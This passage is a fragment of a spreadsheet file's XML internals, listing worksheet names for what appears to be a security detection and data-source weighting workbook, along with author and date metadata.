      <c r="E197" s="1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RatingLegend</vt:lpstr>
      <vt:lpstr>DataSourceEvents</vt:lpstr>
      <vt:lpstr>Detection</vt:lpstr>
      <vt:lpstr>DefenseMitigation</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights (2)</vt:lpstr>
      <vt:lpstr>DefenseBypassWeights</vt:lpstr>
      <vt:lpstr>TechniqueApplication</vt:lpstr>
      <vt:lpstr>Knowledge base</vt:lpstr>
      <vt:lpstr>REF-DataSources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Olaf Hartong</dc:creator>
  <cp:lastModifiedBy>Olaf Hartong</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T13:18:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-02T21:59:56Z</dcterms:modified>
</cp:coreProperties>
</file>